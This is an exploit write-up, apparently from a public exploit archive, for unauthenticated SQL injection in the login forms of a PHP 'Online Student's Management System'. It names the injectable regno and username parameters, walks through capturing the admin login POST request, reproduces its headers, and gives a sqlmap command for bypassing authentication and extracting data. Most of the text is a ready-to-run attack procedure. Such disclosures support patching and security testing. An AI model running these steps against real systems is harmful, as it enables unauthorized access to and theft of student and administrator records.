# Title: Online Student's Management System - Unauthenticated Multiple  
SQL Injections  
# Exploit Author: George Tsimpidas  
# Date: 2020-10-09  
# Vendor Homepage:  
# Software Link:  
# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)  
# Category: Webapp  
# Description  
The files index.php on the main login page, and the index.php on the  
/admin/ login page does not perform input validation on the regno  
and username parameters. An attacker can send malicious input in the post  
request to http://localhost/index.php or either  
http://localhost/admin/index.php and bypass authentication, extract  
sensitive information etc.  
1) Navigate to the admin login page  
2) Fill in dummy values for 'username' and 'password' fields and send the  
request via an HTTP intercept tool  
3) Save the request to file. Example, student_record_sqli.req  
POST /admin/index.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 32  
Origin: http://localhost  
DNT: 1  
Connection: close  
4) Run SQLmap on the file,  
sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username